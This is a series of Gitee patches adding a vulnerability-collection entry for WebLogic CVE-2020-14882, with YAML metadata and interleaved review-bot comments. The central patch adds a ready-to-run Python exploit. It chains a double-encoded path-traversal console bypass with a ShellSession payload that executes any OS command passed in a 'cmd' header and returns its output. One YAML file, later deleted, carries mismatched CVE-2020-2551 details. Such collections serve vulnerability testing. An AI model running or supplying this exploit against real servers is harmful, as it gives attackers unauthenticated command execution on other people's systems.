From d3465f0683cac4bd01b90e4e9f13fd1811d47a11 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:19:18 +0000
Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-14882?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/weblogic/2020/CVE-2020-14882/.keep | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/weblogic/2020/CVE-2020-14882/.keep
diff --git a/cve/weblogic/2020/CVE-2020-14882/.keep b/cve/weblogic/2020/CVE-2020-14882/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 50df74a23981b316d53aeb6fa1e6f9db8f1bf034 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:20:03 +0000
Subject: [PATCH 2/8] rename cve/weblogic/2020/CVE-2020-14882/.keep to cve/weblogic/2020/CVE-2020-14882/.py.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 欣欣向荣-buaa
---
 cve/weblogic/2020/CVE-2020-14882/.keep | 0
 cve/weblogic/2020/CVE-2020-14882/.py | 64 ++++++++++++++++++++++++++
 2 files changed, 64 insertions(+)
 delete mode 100644 cve/weblogic/2020/CVE-2020-14882/.keep
 create mode 100644 cve/weblogic/2020/CVE-2020-14882/.py
diff --git a/cve/weblogic/2020/CVE-2020-14882/.keep b/cve/weblogic/2020/CVE-2020-14882/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/weblogic/2020/CVE-2020-14882/.py b/cve/weblogic/2020/CVE-2020-14882/.py
new file mode 100644
index 00000000..23d5336d
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-14882/.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# author: XINXINXIANGRONG
+import http.client
+import requests
+import sys
+import argparse
+http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+
+payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle='
+ 'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = '
+ '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = '
+ 'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField'
+ '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet'
+ '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) '
+ 'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); '
+ 'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]'
+ '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result '
+ '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter'
+ '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.'
+ 'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);'
+ 'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));'
+ 'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");')
+
+def cve_2020_14882(url, cmd):
+ payload = payload_cve_2020_14882_v12
+ path = "/console/css/%252e%252e%252fconsole.portal"
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,'
+ 'application/signed-exchange;v=b3;q=0.9',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Accept-Language': 'zh-CN,zh;q=0.9',
+ 'Connection': 'close',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'cmd': cmd
+ }
+ try:
+ request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False)
+ print(request.text)
+ except Exception as error:
+ print("[-] Vuln Check Failed... ...")
+ print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap")
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882',
+ usage='use "python %(prog)s --help" for more information',
+ formatter_class=argparse.RawTextHelpFormatter)
+ parser.add_argument("-u", "--url",
+ dest="url",
+ help="target url (http://127.0.0.1:7001)"
+ )
+
+ parser.add_argument("-c", "--cmd",
+ dest="cmd",
+ help="command"
+ )
+ args = parser.parse_args()
+ if not args.url or not args.cmd:
+ sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://127.0.0.1:7001 -c whoami')
+ cve_2020_14882(args.url, args.cmd)
\ No newline at end of file
-- Gitee
From ebcf1932972b9bb9c415de07d398fa878139dced Mon Sep 17 00:00:00 2001
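Review bot: In `cve_2020_14882` the `except Exception as error:` branch never uses `error`, so a refused connection, a timeout and `requests` rejecting a `cmd` value that contains a newline (its header-injection guard) all print the same `[-] Vuln Check Failed... ...`; include the exception, e.g. `print(f"[-] Vuln Check Failed... ... {error!r}")`. The success path prints `request.text` without looking at `request.status_code`, so a patched target that answers the `%252e%252e%252f` traversal with a 404 or the console login page is echoed as though it were command output — print the status code with the body, or treat a non-200 answer as not vulnerable. The constant is suffixed `_v12` because `com.tangosol.coherence.mvel2.sh.ShellSession` is a Coherence class that, as far as I know, is only present in 12.2.1.x installs, so the 10.3.6 and 12.1.3 releases listed as affected elsewhere in this series would need a different gadget; a comment on the constant naming the release it targets would prevent false negatives being read as "not vulnerable". `http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'` rewrites a private stdlib attribute for the whole process with no explanation — add a one-line why-comment or drop it if the request also works over HTTP/1.1.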
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:20:56 +0000
Subject: [PATCH 3/8] add cve/weblogic/2020/yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 欣欣向荣-buaa
---
 cve/weblogic/2020/yaml/cve-2020-14882.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 cve/weblogic/2020/yaml/cve-2020-14882.yaml
diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml
new file mode 100644
index 00000000..e69de29b
-- Gitee
From ee55c5acc61d570bd211d48ae7a16d91ae67a8c1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:55:33 +0000
Subject: [PATCH 4/8] update cve/weblogic/2020/yaml/cve-2020-14882.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 欣欣向荣-buaa
---
 cve/weblogic/2020/yaml/cve-2020-14882.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml
index e69de29b..a1540092 100644
--- a/cve/weblogic/2020/yaml/cve-2020-14882.yaml
+++ b/cve/weblogic/2020/yaml/cve-2020-14882.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-2551
+source: https://github.com/hktalent/CVE-2020-2551
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ - https://www.oracle.com/security-alerts/cpujan2020.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-2551
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
-- Gitee
From 1777d2eaa742e9767c29ecaaea12a3f66a30bdb4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:56:31 +0000
Subject: [PATCH 5/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?weblogic/2020/yaml/cve-2020-14882.yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/weblogic/2020/yaml/cve-2020-14882.yaml | 20 --------------------
 1 file changed, 20 deletions(-)
 delete mode 100644 cve/weblogic/2020/yaml/cve-2020-14882.yaml
diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml
deleted file mode 100644
index a1540092..00000000
--- a/cve/weblogic/2020/yaml/cve-2020-14882.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: CVE-2020-2551
-source: https://github.com/hktalent/CVE-2020-2551
-info:
- name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
- severity: critical
- description: |
- 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
- scope-of-influence:
- weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
- reference:
- - https://www.oracle.com/security-alerts/cpujan2020.html
- - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2020-2551
- cwe-id: None
- cnvd-id: None
- kve-id: None
- tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
-- Gitee
From 1c90f2ef5be67c0d5118f37cc15c500f7e423d90 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 08:57:43 +0000
Subject: [PATCH 6/8] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogic/?= =?UTF-8?q?2020/CVE-2020-14882/.py=20=E4=B8=BA=20cve/weblogic/2020/CVE-202?= =?UTF-8?q?0-14882/CVE-2020-14882.py?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/weblogic/2020/CVE-2020-14882/{.py => CVE-2020-14882.py} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename cve/weblogic/2020/CVE-2020-14882/{.py => CVE-2020-14882.py} (100%)
diff --git a/cve/weblogic/2020/CVE-2020-14882/.py b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py
similarity index 100%
rename from cve/weblogic/2020/CVE-2020-14882/.py
rename to cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py
-- Gitee
From a65577b39773a622e848b9c63e38b2b783a0f6f1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 09:02:02 +0000
Subject: [PATCH 7/8] add cve/weblogic/2020/yaml/CVE-2020-14882.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 欣欣向荣-buaa
---
 cve/weblogic/2020/yaml/CVE-2020-14882.yaml | 23 ++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cve/weblogic/2020/yaml/CVE-2020-14882.yaml
diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
new file mode 100644
index 00000000..94ff4774
--- /dev/null
+++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-14882
+source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ https://nvd.nist.gov/vuln/detail/CVE-2020-14882
+ https://www.oracle.com/security-alerts/cpuoct2020.html
+ http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
+ http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-14882
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Weblogic
\ No newline at end of file
-- Gitee
From a6dc7ed23074c9532812de7cc5bf48e0e7ce44bc Mon Sep 17 00:00:00 2001
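Review bot: The five `reference:` entries in the new `CVE-2020-14882.yaml` are bare indented lines without the `- ` list marker that the sibling CVE-2020-2551 entry uses, so a YAML parser folds them into one plain scalar (`https://nvd.nist.gov/... https://www.oracle.com/... ...`) instead of a list; prefix each URL with `- `. The `description` states only that an unauthenticated user can bypass console authentication, while the `source` this entry points to (`cve-2020-14882_rce.py`) goes on to run OS commands through the console's `handle` parameter, so the text should say the bypass leads to unauthenticated remote code execution on the admin console port. `scope-of-influence` stops at 12.2.1.4.0; I believe the linked cpuoct2020 advisory also lists 14.1.1.0.0 for this CVE — verify against the advisory and add it if so. `cwe-id: None` leaves the classification empty although the NVD page is already in `reference:`; fill it from there rather than recording `None`.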
From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?=
Date: Thu, 30 Mar 2023 09:03:37 +0000
Subject: [PATCH 8/8] update openkylin_list.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 欣欣向荣-buaa
---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 24cb593f..3bc82cfc 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -86,6 +86,7 @@ cve:
 - CVE-2022-26134
 weblogic:
 - CVE-2020-2551
+ - CVE-2020-14882
 polkit:
 - CVE-2021-4034
 - CVE-2021-4115
-- Gitee